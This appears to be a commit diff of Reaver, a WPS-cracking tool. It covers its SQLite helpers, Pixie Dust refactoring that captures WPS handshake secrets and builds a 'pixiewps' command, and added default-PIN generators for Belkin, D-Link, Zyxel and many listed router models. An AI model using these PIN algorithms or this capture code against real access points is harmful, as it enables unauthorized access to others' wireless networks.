214		q = sqlite3_mprintf("UPDATE %s SET essid = %Q, manufacturer = %Q, model_name = %Q, model_number = %Q, device_name = %Q, version ='%d', state = '%d', locked = '%d', encryption = '%d' WHERE bssid = %Q AND complete <> '1'", AP_TABLE, essid, wps->manufacturer, wps->model_name, wps->model_number, wps->device_name, wps->version, wps->state, wps->locked, encryption, bssid);
215
216		if(q)
217		{
218		if(sql_exec(q) == SQLITE_OK)
219		{
220		result = 1;
221		}
222
223		sqlite3_free(q);
224		}
225		}
226
227		return result;
228		}
229
230		int sql_exec(char *query)
231		{
232		int result = SQLITE_ERROR;
233
234		if(query)
235		{
236		do
237		{
238		result = sqlite3_exec(db, query, NULL, NULL, NULL);
239		usleep(BUSY_WAIT_PERIOD);
240		}
241		while(result == SQLITE_BUSY);
242		}
243
244		return result;
245		}
246
247		char get_db_ssid(char bssid)
248		{
249		char *ssid = NULL;
250		int size = 0, err = 0;
251		char *q = sqlite3_mprintf("SELECT essid FROM %s WHERE bssid = %Q LIMIT 1", AP_TABLE, bssid);
252
253		if(q)
254		{
255		ssid = (char *) get(q, &size, &err);
256		if(err != SQLITE_OK \|\| size < 0)
257		{
258		if(ssid) free(ssid);
259		ssid = NULL;
260		}
261
262		sqlite3_free(q);
263		}
264
265		return ssid;
266		}
267
268		char *auto_detect_settings(char bssid, int *argc)
269		{
270		int size = 0, err = 0, i = 0;
271		char args = NULL, token = NULL;
272		char argv = NULL, tmp = NULL;
273		char *q1 = sqlite3_mprintf("SELECT args FROM %s WHERE model_name = (SELECT model_name FROM %s WHERE bssid = %Q LIMIT 1) AND model_number = (SELECT model_number FROM %s WHERE bssid = %Q LIMIT 1) AND device_name = (SELECT device_name FROM %s WHERE bssid = %Q LIMIT 1) LIMIT 1", SETTINGS_TABLE, AP_TABLE, bssid, AP_TABLE, bssid, AP_TABLE, bssid);
274		char *q2 = sqlite3_mprintf("SELECT args FROM %s WHERE manufacturer LIKE (SELECT manufacturer FROM %s WHERE bssid = %Q LIMIT 1) LIMIT 1", SETTINGS_TABLE, AP_TABLE, bssid);
275
276		if(q1 && q2)
277		{
278		args = (char *) get(q1, &size, &err);
279		if(err != SQLITE_OK \|\| size <= 0 \|\| args == NULL)
280		{
281		args = (char *) get(q2, &size, &err);
282		}
283
284		if(err == SQLITE_OK && size > 0 && args != NULL)
285		{
286		token = strtok(args, " ");
287		if(token)
288		{
289		argv = malloc(sizeof(char *));
290		argv[i] = strdup("reaver");
291		i++;
292
293		do
294		{
295		tmp = argv;
296		argv = realloc(argv, ((i + 1) * sizeof(char *)));
297		if(!argv)
298		{
299		free(tmp);
300		i = 0;
301		break;
302		}
303		else if(argv != tmp)
304		{
305		free(tmp);
306		}
307
308		argv[i] = strdup(token);
309		i++;
310
311		} while((token = strtok(NULL, " ")) != NULL);
312		}
313
314		free(args);
315		}
316
317		sqlite3_free(q1);
318		sqlite3_free(q2);
319		}
320
321		*argc = i;
322
323		return argv;
324		}
325
326		/* Execute given SQL query. Will only return the FIRST row of the FIRST column of data. Caller must free the returned pointer. */
327		void get(char query, int result_size, int err_code)
328		{
329		sqlite3_stmt *stmt = NULL;
330		int rc = 0, col_type = 0;
331		void result = NULL, tmp_result = NULL;
332
333		*result_size = 0;
334
335		if(!query){
336		return NULL;
337		}
338
339		/* Prepare the SQL query */
340		rc = sqlite3_prepare_v2(db,query,strlen(query),&stmt,NULL);
341		if(rc != SQLITE_OK){
342		*err_code = sqlite3_errcode(db);
343		return NULL;
344		}
345
346		/* Loop until the query has finished */
347		while(((rc = sqlite3_step(stmt)) != SQLITE_DONE) && (result == NULL)){
348		switch(rc){
349
350		case SQLITE_ERROR:
351		*err_code = sqlite3_errcode(db);
352		sqlite3_finalize(stmt);
353		return NULL;
354		break;
355
356		case SQLITE_BUSY:
357		/* If the table is locked, wait then try again */
358		usleep(BUSY_WAIT_PERIOD);
359		break;
360
361		case SQLITE_ROW:
362		{
363		col_type = sqlite3_column_type(stmt,0);
364		switch(col_type)
365		{
366		case SQLITE_TEXT:
367		case SQLITE_INTEGER:
368		tmp_result = (void *) sqlite3_column_text(stmt,0);
369		break;
370
371		case SQLITE_BLOB:
372		tmp_result = (void *) sqlite3_column_blob(stmt,0);
373		break;
374
375		default:
376		continue;
377		}
378
379		/* Get the size of the data we just received from the database */
380		*result_size = sqlite3_column_bytes(stmt,0);
381
382		/* Create a copy of tmp_result to pass back to the caller */
383		if((tmp_result != NULL) && (*result_size > 0)){
384		if((result = malloc(*result_size+1)) == NULL){
385		perror("Malloc failure");
386		return NULL;
387		}
388		memset(result,0,*result_size+1);
389		memcpy(result,tmp_result,*result_size);
390		}
391		break;
392		}
393		}
394		}
395
396		sqlite3_finalize(stmt);
397		*err_code = sqlite3_errcode(db);
398
399		return result;
400		}
401
402		char *sql_error_string(void)
403		{
404		return (char *) sqlite3_errmsg(db);
405		}
406
407		void sql_cleanup(void)
408		{
409		sqlite3_close(db);
410		db = NULL;
411		}

+0

-72

~~src/sql.h~~ less more

0		/*
1		* Reaver - SQLite wrapper functions
2		* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
3		*
4		* This program is free software; you can redistribute it and/or modify
5		* it under the terms of the GNU General Public License as published by
6		* the Free Software Foundation; either version 2 of the License, or
7		* (at your option) any later version.
8		*
9		* This program is distributed in the hope that it will be useful,
10		* but WITHOUT ANY WARRANTY; without even the implied warranty of
11		* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12		* GNU General Public License for more details.
13		*
14		* You should have received a copy of the GNU General Public License
15		* along with this program; if not, write to the Free Software
16		* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17		*
18		*
19		* In addition, as a special exception, the copyright holders give
20		* permission to link the code of portions of this program with the
21		* OpenSSL library under certain conditions as described in each
22		* individual source file, and distribute linked combinations
23		* including the two.
24		* You must obey the GNU General Public License in all respects
25		* for all of the code used other than OpenSSL. * If you modify
26		* file(s) with this exception, you may extend this exception to your
27		* version of the file(s), but you are not obligated to do so. * If you
28		* do not wish to do so, delete this exception statement from your
29		* version. * If you delete this exception statement from all source
30		* files in the program, then also delete it here.
31		*/
32
33		#ifndef _SQL_H_
34		#define _SQL_H_
35
36		#include <unistd.h>
37		#include <string.h>
38		#include <sqlite3.h>
39		#include <libwps.h>
40		#include "defs.h"
41		#include "globule.h"
42
43		#ifndef REAVER_DATABASE
44		#define REAVER_DATABASE "/etc/reaver/reaver.db"
45		#endif
46
47		#define BUSY_WAIT_PERIOD 100
48		#define SETTINGS_TABLE "auto"
49		#define HISTORY_TABLE "history"
50		#define AP_TABLE "survey"
51		#define DROP_TABLE "DROP TABLE %s"
52		#define CREATE_TABLE "CREATE TABLE %s (bssid TEXT PRIMARY KEY NOT NULL, essid TEXT, manufacturer TEXT, model_name TEXT, model_number TEXT, device_name TEXT, version INTEGER DEFAULT 0, state INTEGER DEFAULT 0, locked INTEGER DEFAULT 0, encryption INTEGER DEFAULT 0, probes INTEGER DEFAULT 0, rssi TEXT, complete INTEGER DEFAULT 0, rowid INTEGER NOT NULL)"
53
54		int sql_init(void);
55		int create_ap_table(void);
56		int update_probe_count(char *bssid);
57		int update_ap_power(char *bssid, int8_t ssi);
58		int update_history(char bssid, char essid, int attempts, char *key);
59		int mark_ap_complete(char *bssid);
60		int is_done(char *bssid);
61		int should_probe(char *bssid);
62		int update(char bssid, char essid, struct libwps_data *wps, int encryption);
63		int insert(char bssid, char essid, struct libwps_data *wps, int encryption, int rssi);
64		char get_db_ssid(char bssid);
65		char *auto_detect_settings(char bssid, int *argc);
66		int sql_exec(char *query);
67		void get(char query, int result_size, int err_code);
68		char *sql_error_string(void);
69		void sql_cleanup(void);
70
71		#endif

+65

-27

src/utils/common.c less more

14	14	#include "includes.h"
15	15
16	16	#include "common.h"
	17	#include "wps.h"
17	18
18	19
19	20	static int hex2num(char c)

411	412	}
412	413
413	414
414		/* http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/ */
415		/* Generates a standard WPS checksum from a 7 digit pin */
416		int wps_checksum(int pin)
417		{
418		int div = 0;
419
420		while(pin)
421		{
422		div += 3 * (pin % 10);
423		pin /= 10;
424		div += pin % 10;
425		pin /= 10;
426		}
427
428		return ((10 - div % 10) % 10);
429		}
430
431	415	unsigned int hexToInt(const char *hex)
432	416	{
433	417	unsigned int result = 0;

452	436	/* Belkin Default Pin generator created by devttys0 team */
453	437	/* http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/ */
454	438	/* Munges the MAC and serial numbers to create a WPS pin */
455		int pingen_belkin(char mac, char serial, int len_serial, int add)
	439	int pingen_belkin(const char mac, const char serial, int len_serial, int add)
456	440	{
457	441	#define NIC_NIBBLE_0 0
458	442	#define NIC_NIBBLE_1 1

529	513	//pingen mac init c83a35
530	514	//printf("WPS PIN is: %07d%d\n",4402328%10000000,wps_checksum(4402328%10000000));
531	515
532		return (pin * 10) + wps_checksum(pin);
	516	return (pin * 10) + wps_pin_checksum(pin);
533	517	}
534	518
535	519

542	526	http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
543	527	*/
544	528
545		int pingen_dlink(char mac, char serial, int len_serial, int add)
546		{
547		int mac_len=0, serial_len=0, nic=0, pin=0;
	529	int pingen_dlink(char *mac, int add)
	530	{
	531	int nic=0, pin=0;
548	532	char buff[10];
549
550		mac_len = strlen(mac);
551		serial_len = len_serial;
552	533
553	534	nic = hexToInt(strncpy(buff, mac+6, sizeof(buff)));
554	535	nic = nic + add;

567	548
568	549	}
569	550
570		return (pin * 10) + wps_checksum(pin);
571		}
	551	return (pin * 10) + wps_pin_checksum(pin);
	552	}
	553
	554	/* Zhaochunsheng algorithm
	555	This algorithm was first released in the script ComputePIN-C83A35 for Tenda W309R (April 2012)
	556	The same algorithm was found on several devices from different manufacturers.
	557	This is a non exhaustive list of affected models:
	558	ASUSTek COMPUTER INC. RT-G32
	559	Belkin F5D8235-4v1000, F5D8231-4v5000 and F9K1104v1
	560	Conceptronic c300brs4a v2_v1.0.0 and C300BRS4A
	561	D-Link International DIR-620
	562	Edimax 3G-6210n and 3G-6220n
	563	Hitron Technologies. Inc CDE-30364
	564	HUAWEI HG532e, HG532s and HG566a (HG532c uses a slightly modified version of this algorithm)
	565	Kuzomi K1500 and K1550
	566	Samsung SMT-G7440 and SWL (Samsung Wireless Link)
	567	TELDAT iRouter1104-W
	568	TENDA W309R
	569	TP-LINK CO., LTD. TD-W8951ND and TD-W8961ND v2.1
	570	TRENDnet, Inc. TEW-652BRP (TEW-818DRU and TEW-828DRU use a slightly modified version of this algorithm)
	571	ZyXEL Communications Co. zyxel NBG-419n and WAP 3205 *
	572	*/
	573
	574	int pingen_zhaochunsheng(char *mac, int add)
	575	{
	576	int pin = 0;
	577	/* copy the last 3 bytes of the mac addr, i.e.
	578	input: "C8:3A:35:00:11:22" -> result: "001122" */
	579	char last3bytes[6+1];
	580	last3bytes[0]=mac[ 9];
	581	last3bytes[1]=mac[10];
	582
	583	last3bytes[2]=mac[12];
	584	last3bytes[3]=mac[13];
	585
	586	last3bytes[4]=mac[15];
	587	last3bytes[5]=mac[16];
	588
	589	last3bytes[6] = 0;
	590
	591	sscanf(last3bytes, "%x", &pin);
	592	pin = pin % 10000000;
	593	return (pin * 10) + wps_pin_checksum(pin);
	594	}
	595
	596	//mac to decimal by kib0rg
	597	int pingen_zyxel(char *mac, int add)
	598	{
	599	//pingen make by kib0rg, a little change by t6x
	600	int pin;
	601
	602	char mac_address[7] = {0};
	603
	604	sprintf(mac_address, "%c%c%c%c%c%c", mac[6], mac[7], mac[8], mac[9], mac[10], mac[11]);
	605
	606	pin = (hexToInt(mac_address) + add) % 10000000;
	607
	608	return (pin * 10) + wps_pin_checksum(pin);
	609	}

+3

-2

src/utils/common.h less more

443	443	int wpa_snprintf_hex_uppercase(char buf, size_t buf_size, const u8 data,
444	444	size_t len);
445	445
446		int pingen_belkin(char mac, char serial, int len_serial, int add);
447		int pingen_dlink(char mac, char serial, int len_serial, int add);
	446	int pingen_belkin(const char mac, const char serial, int len_serial, int add);
	447	int pingen_dlink(char *mac, int add);
	448	int pingen_zyxel(char *mac, int add);
448	449
449	450	#ifdef CONFIG_NATIVE_WINDOWS
450	451	void wpa_unicode2ascii_inplace(TCHAR *str);

+0

-34

~~src/wps/Makefile~~ less more

0		CC=gcc
1		INC=-I../utils -I ../
2
3		all: wps_attr_build.o wps_attr_parse.o wps_attr_process.o wps.o wps_common.o wps_dev_attr.o wps_enrollee.o wps_registrar.o wps_ufd.o
4
5		wps_attr_build.o:
6		$(CC) $(INC) wps_attr_build.c -c
7
8		wps_attr_parse.o:
9		$(CC) $(INC) wps_attr_parse.c -c
10
11		wps_attr_process.o:
12		$(CC) $(INC) wps_attr_process.c -c
13
14		wps.o:
15		$(CC) $(INC) wps.c -c
16
17		wps_common.o:
18		$(CC) $(INC) wps_common.c -c
19
20		wps_dev_attr.o:
21		$(CC) $(INC) wps_dev_attr.c -c
22
23		wps_enrollee.o:
24		$(CC) $(INC) wps_enrollee.c -c
25
26		wps_registrar.o:
27		$(CC) $(INC) wps_registrar.c -c
28
29		wps_ufd.o:
30		$(CC) $(INC) wps_ufd.c -c
31
32		clean:
33		rm -f *.o

+9

-1

src/wps/t6.h less more

3	3	char pixie_buf_aux[4000];
4	4	char pixie_buf_aux2[4000];
5	5
6
	6	//fixed size
	7	char pixie_pke[1000]; /* save pke */
	8	char pixie_pkr[1000]; /* save pkr */
	9	char pixie_enonce[100]; /* save e-nonce */
	10	char pixie_rnonce[100]; /* save r-nonce */
	11	char pixie_authkey[100]; /* save AuthKey */
	12	char pixie_ehash1[100]; /* save e-hash1 */
	13	char pixie_ehash2[100]; /* save e-hash2 */
	14
7	15	//int op_pixie=0;
8	16

+1

-1

src/wps/wps.h less more

48	48	* @cred_attr_len: Length of cred_attr in octets
49	49	*/
50	50	struct wps_credential {
51		u8 ssid[32];
	51	char ssid[32];
52	52	size_t ssid_len;
53	53	u16 auth_type;
54	54	u16 encr_type;

+19

-16

src/wps/wps_attr_build.c less more

61	61	wpabuf_free(wps->dh_pubkey_r);
62	62	wps->dh_pubkey_r = pubkey;
63	63
64		if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3)
65		{
66		strcat(cmd_pixie," -r ");
67		}
68
69	64	unsigned char *v;
70	65	v = wpabuf_mhead_u8(pubkey);
71		printf("[P] PKR: ");
	66
	67	memset(pixie_pkr,0,sizeof(pixie_pkr));
	68	if ( get_debug()==4 )
	69	{ //verbose (-vvv)
	70	printf("[P] PKR: ");
	71	}
72	72	int pixiecnt = 0;
73	73	for (; pixiecnt < 192; pixiecnt++) {
74		printf("%02x", v[pixiecnt]);
75		if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3)
76		{
77		sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]);
78		strcat(cmd_pixie,cmd_pixie_aux);
	74	if ( get_debug()==4 )
	75	{ //verbose (-vvv)
	76	printf("%02x", v[pixiecnt]);
79	77	}
	78	sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]);
	79	strcat(pixie_pkr, cmd_pixie_aux);
80	80	if (pixiecnt != 191) {
81		printf(":");
82		if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3)
83		{
84		strcat(cmd_pixie,":");
	81	if ( get_debug()==4 )
	82	{ //verbose (-vvv)
	83	printf(":");
85	84	}
	85	strcat(pixie_pkr,":");
86	86	}
87	87	}
88		printf("\n");
	88	if ( get_debug()==4 )
	89	{ //verbose (-vvv)
	90	printf("\n");
	91	}
89	92
90	93
91	94

+20

-7

src/wps/wps_common.c less more

128	128	wpa_hexdump_key(MSG_DEBUG, "WPS: EMSK", wps->emsk, WPS_EMSK_LEN);
129	129
130	130	/**** ADD THIS PART ****/
131		strcat(cmd_pixie," -a ");
132		printf("[P] AuthKey: ");
	131
	132	memset(pixie_authkey,0,sizeof(pixie_authkey));
	133	if ( get_debug()==4 )
	134	{ //verbose (-vvv)
	135	printf("[P] AuthKey: ");
	136	}
133	137	int pixiecnt = 0;
134	138	for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
135		printf("%02x", wps->authkey[pixiecnt]);
	139	if ( get_debug()==4 )
	140	{ //verbose (-vvv)
	141	printf("%02x", wps->authkey[pixiecnt]);
	142	}
136	143	sprintf(cmd_pixie_aux, "%02x", wps->authkey[pixiecnt]);
137		strcat(cmd_pixie,cmd_pixie_aux);
	144	strcat(pixie_authkey, cmd_pixie_aux);
138	145	if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
139		printf(":");
140		strcat(cmd_pixie,":");
	146	if ( get_debug()==4 )
	147	{ //verbose (-vvv)
	148	printf(":");
	149	}
	150	strcat(pixie_authkey,":");
141	151	}
142	152	}
143		printf("\n");
	153	if ( get_debug()==4 )
	154	{ //verbose (-vvv)
	155	printf("\n");
	156	}
144	157	/******/
145	158
146	159	return 0;

+65

-19

src/wps/wps_dev_attr.c less more

16	16	#include "includes.h"
17	17
18	18	#include "common.h"
	19	#include "misc.h"
19	20	#include "wps_i.h"
20	21	#include "wps_dev_attr.h"
21	22

188	189	wpa_hexdump_ascii(MSG_DEBUG, "WPS: Manufacturer", str, str_len);
189	190
190	191	/**** ADD THIS PART ****/
191		printf("[P] WPS Manufacturer: ");
	192	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	193	{ //verbose (-vvv)
	194	printf("[P] WPS Manufacturer: ");
	195	}
192	196	int pixiecnt = 0;
193	197	for (; pixiecnt < str_len; pixiecnt++) {
194		printf("%c", (char *) str[pixiecnt]);
195		}
196		printf("\n");
	198	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	199	{ //verbose (-vvv)
	200	printf("%c", str[pixiecnt]);
	201	}
	202	}
	203	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	204	{ //verbose (-vvv)
	205	printf("\n");
	206	}
197	207	/******/
198	208
199	209

220	230	wpa_hexdump_ascii(MSG_DEBUG, "WPS: Model Name", str, str_len);
221	231
222	232	/**** ADD THIS PART ****/
223		printf("[P] WPS Model Name: ");
	233	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	234	{ //verbose (-vvv)
	235	printf("[P] WPS Model Name: ");
	236	}
224	237	int pixiecnt = 0;
225	238	for (; pixiecnt < str_len; pixiecnt++) {
226		printf("%c", (char *) str[pixiecnt]);
227		}
228		printf("\n");
	239	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	240	{ //verbose (-vvv)
	241	printf("%c", str[pixiecnt]);
	242	}
	243	}
	244	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	245	{ //verbose (-vvv)
	246	printf("\n");
	247	}
229	248	/******/
230	249
231	250	os_free(dev->model_name);

250	269	wpa_hexdump_ascii(MSG_DEBUG, "WPS: Model Number", str, str_len);
251	270
252	271	/**** ADD THIS PART ****/
253		printf("[P] WPS Model Number: ");
	272	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	273	{ //verbose (-vvv)
	274	printf("[P] WPS Model Number: ");
	275	}
254	276	int pixiecnt = 0;
255	277	for (; pixiecnt < str_len; pixiecnt++) {
256		printf("%c", (char *) str[pixiecnt]);
257		}
258		printf("\n");
	278	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	279	{ //verbose (-vvv)
	280	printf("%c", str[pixiecnt]);
	281	}
	282	}
	283	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	284	{ //verbose (-vvv)
	285	printf("\n");
	286	}
259	287	/******/
260	288
261	289	os_free(dev->model_number);

280	308	wpa_hexdump_ascii(MSG_DEBUG, "WPS: Serial Number", str, str_len);
281	309
282	310	/**** ADD THIS PART ****/
283		printf("[P] Access Point Serial Number: ");
	311	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	312	{ //verbose (-vvv)
	313	printf("[P] Access Point Serial Number: ");
	314	}
284	315	int pixiecnt = 0;
285	316	for (; pixiecnt < str_len; pixiecnt++) {
286		printf("%c", (char *) str[pixiecnt]);
287		}
288		printf("\n");
	317	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	318	{ //verbose (-vvv)
	319	printf("%c", str[pixiecnt]);
	320	}
	321	}
	322	if ( (get_debug() == 4) \|\| (globule->op_gen_pin >0))
	323	{ //verbose (-vvv)
	324	printf("\n");
	325	}
289	326	/******/
290	327
291	328	if(globule->stop_in_m1 == 1)

315	352	if(globule->op_gen_pin == 2)
316	353	{
317	354	printf("[Pin Gen] D-Link Default Pin Generator by devttys0 team\n");
318		printf("[Pin Gen] Pin Generated : %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, 0));
319		printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, 1));
320		printf("[Pin Gen] Pin Generated (-1): %08d\n\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, -1));
	355	printf("[Pin Gen] Pin Generated : %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), 0));
	356	printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), 1));
	357	printf("[Pin Gen] Pin Generated (-1): %08d\n\n",pingen_dlink(mac2str(get_bssid(),'\0'), -1));
321	358	exit(0);
322	359	}
	360
	361	if(globule->op_gen_pin == 3)
	362	{
	363	printf("[Pin Gen] Zyxel Default Pin Generator\n");
	364	printf("[Pin Gen] Pin Generated : %08d\n",pingen_zyxel(mac2str(get_bssid(),'\0'), 0));
	365	printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_zyxel(mac2str(get_bssid(),'\0'), 1));
	366	printf("[Pin Gen] Pin Generated (-1): %08d\n",pingen_zyxel(mac2str(get_bssid(),'\0'), -1));
	367	exit(0);
	368	}
323	369
324	370	os_free(dev->serial_number);
325	371	dev->serial_number = os_malloc(str_len + 1);

+1

-21

src/wps/wps_enrollee.c less more

513	513	static int wps_process_pubkey(struct wps_data wps, const u8 pk,
514	514	size_t pk_len)
515	515	{
516		printf("--------------------------------------------------------------------------------------");
	516
517	517	if (pk == NULL \|\| pk_len == 0) {
518	518	wpa_printf(MSG_DEBUG, "WPS: No Public Key received");
519	519	return -1;

543	543
544	544	if (wps_derive_keys(wps) < 0)
545	545	return -1;
546
547
548		/**** ADD THIS PART ****/
549
550
551		printf("[P] PKR: ");
552		int pixiecnt = 0;
553		for (; pixiecnt < 192; pixiecnt++) {
554		printf("%02x", pk[pixiecnt]);
555		if (pixiecnt != 191) {
556		printf(":");
557		}
558		}
559		printf("\n");
560		/******/
561
562
563
564
565
566	546
567	547	return 0;
568	548	}

+335

-89

src/wps/wps_registrar.c less more

1394	1394	wps->nonce_r, WPS_NONCE_LEN);
1395	1395	wpa_hexdump(MSG_DEBUG, "WPS: UUID-R", wps->uuid_r, WPS_UUID_LEN);
1396	1396
1397
1398		printf("[P] R-Nonce: ");
	1397	if ( get_debug()==4 )
	1398	{ //verbose (-vvv)
	1399	printf("[P] R-Nonce: ");
	1400	}
1399	1401	int pixiecnt = 0;
1400	1402	for (; pixiecnt < WPS_NONCE_LEN; pixiecnt++)
1401	1403	{
1402		printf("%02x", wps->nonce_r[pixiecnt]);
	1404	if ( get_debug()==4 )
	1405	{ //verbose (-vvv)
	1406	printf("%02x", wps->nonce_r[pixiecnt]);
	1407	}
1403	1408	if (pixiecnt != WPS_NONCE_LEN - 1) {
1404		printf(":");
1405		}
1406		}
1407		printf("\n");
	1409	if ( get_debug()==4 )
	1410	{ //verbose (-vvv)
	1411	printf(":");
	1412	}
	1413	}
	1414	}
	1415	if ( get_debug()==4 )
	1416	{ //verbose (-vvv)
	1417	printf("\n");
	1418	}
1408	1419	/******/
1409	1420
1410	1421

1484	1495
1485	1496	wpa_printf(MSG_DEBUG, "WPS: Building Message M4");
1486	1497
1487		wpa_printf(MSG_DEBUG, "WPS: Dev Password Len: %d", wps->dev_password_len);
	1498	wpa_printf(MSG_DEBUG, "WPS: Dev Password Len: %zu", wps->dev_password_len);
1488	1499	wpa_printf(MSG_DEBUG, "WPS: Dev Password: %s", wps->dev_password);
1489	1500
1490	1501	wps_derive_psk(wps, wps->dev_password, wps->dev_password_len);

1711	1722	wps->nonce_e, WPS_NONCE_LEN);
1712	1723
1713	1724	/**** ADD THIS PART ****/
1714		memset(cmd_pixie,0,sizeof(cmd_pixie));
1715	1725	memset(cmd_pixie_aux,0,sizeof(cmd_pixie_aux));
1716		strcat(cmd_pixie,"pixiewps ");
1717
1718		if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3)
1719		{
1720		strcat(cmd_pixie," -n ");
1721		}
1722		printf("[P] E-Nonce: ");
	1726	memset(pixie_enonce,0,sizeof(pixie_enonce));
	1727
	1728	if ( get_debug()==4 )
	1729	{ //verbose (-vvv)
	1730	printf("[P] E-Nonce: ");
	1731	}
1723	1732	int pixiecnt = 0;
1724	1733	for (; pixiecnt < WPS_NONCE_LEN; pixiecnt++)
1725	1734	{
1726		printf("%02x", wps->nonce_e[pixiecnt]);
1727		if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3)
1728		{
1729		sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]);
1730		strcat(cmd_pixie,cmd_pixie_aux);
1731		}
	1735	if ( get_debug()==4 )
	1736	{ //verbose (-vvv)
	1737	printf("%02x", wps->nonce_e[pixiecnt]);
	1738	}
	1739	sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]);
	1740	strcat(pixie_enonce, cmd_pixie_aux);
1732	1741	if (pixiecnt != WPS_NONCE_LEN - 1) {
1733		printf(":");
1734		if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3)
1735		{
1736		strcat(cmd_pixie,":");
	1742	if ( get_debug()==4 )
	1743	{ //verbose (-vvv)
	1744	printf(":");
1737	1745	}
1738		}
1739		}
1740		printf("\n");
	1746	strcat(pixie_enonce,":");
	1747	}
	1748	}
	1749	if ( get_debug()==4 )
	1750	{ //verbose (-vvv)
	1751	printf("\n");
	1752	}
1741	1753	/******/
1742	1754
1743	1755

1798	1810	wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);
1799	1811
1800	1812	/**** ADD THIS PART ****/
1801		strcat(cmd_pixie," -s ");
1802		printf("[P] E-Hash1: ");
	1813	memset(pixie_ehash1,0,sizeof(pixie_ehash1));
	1814	if ( get_debug()==4 )
	1815	{ //verbose (-vvv)
	1816	printf("[P] E-Hash1: ");
	1817	}
	1818
1803	1819	int pixiecnt = 0;
1804	1820	for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
1805		printf("%02x", wps->peer_hash1[pixiecnt]);
	1821	if ( get_debug()==4 )
	1822	{ //verbose (-vvv)
	1823	printf("%02x", wps->peer_hash1[pixiecnt]);
	1824	}
1806	1825	sprintf(cmd_pixie_aux, "%02x", wps->peer_hash1[pixiecnt]);
1807		strcat(cmd_pixie,cmd_pixie_aux);
	1826	strcat(pixie_ehash1, cmd_pixie_aux);
1808	1827	if (pixiecnt != WPS_HASH_LEN - 1) {
1809		printf(":");
1810		strcat(cmd_pixie,":");
1811		}
1812		}
1813		printf("\n");
	1828	if ( get_debug()==4 )
	1829	{ //verbose (-vvv)
	1830	printf(":");
	1831	}
	1832	strcat(pixie_ehash1,":");
	1833	}
	1834	}
	1835	if ( get_debug()==4 )
	1836	{ //verbose (-vvv)
	1837	printf("\n");
	1838	}
1814	1839	/******/
1815
	1840
1816	1841
1817	1842	return 0;
1818	1843	}

1828	1853	os_memcpy(wps->peer_hash2, e_hash2, WPS_HASH_LEN);
1829	1854	wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);
1830	1855
	1856	//get_debug() = 4(-vvv), use this to verbose all pixie msg
	1857
	1858
1831	1859	/**** ADD THIS PART ****/
1832		strcat(cmd_pixie," -z ");
1833		printf("[P] E-Hash2: ");
	1860	memset(pixie_ehash2,0,sizeof(pixie_ehash2));
	1861	if ( get_debug()==4 )
	1862	{ //verbose (-vvv)
	1863	printf("[P] E-Hash2: ");
	1864	}
1834	1865	int pixiecnt = 0;
1835	1866	for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
1836		printf("%02x", wps->peer_hash2[pixiecnt]);
	1867	if ( get_debug()==4 )
	1868	{ //verbose (-vvv)
	1869	printf("%02x", wps->peer_hash2[pixiecnt]);
	1870	}
1837	1871	sprintf(cmd_pixie_aux, "%02x", wps->peer_hash2[pixiecnt]);
1838		strcat(cmd_pixie,cmd_pixie_aux);
	1872	strcat(pixie_ehash2, cmd_pixie_aux);
1839	1873	if (pixiecnt != WPS_HASH_LEN - 1) {
1840		printf(":");
1841		strcat(cmd_pixie,":");
1842		}
1843		}
1844		printf("\n");
	1874	if ( get_debug()==4 )
	1875	{ //verbose (-vvv)
	1876	printf(":");
	1877	}
	1878	strcat(pixie_ehash2,":");
	1879	}
	1880	}
	1881	if ( get_debug()==4 )
	1882	{ //verbose (-vvv)
	1883	printf("\n");
	1884	}
1845	1885	/******/
1846
1847		if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3){
1848		//strcat(cmd_pixie," -S ");
1849		strcat(cmd_pixie," ");
1850		}
1851		//sprintf(cmd_pixie,"%s -S",cmd_pixie);
1852
	1886
	1887	memset(cmd_pixie,0,sizeof(cmd_pixie));
	1888
	1889	strcat(cmd_pixie,"pixiewps -e ");
	1890	strcat(cmd_pixie,pixie_pke);
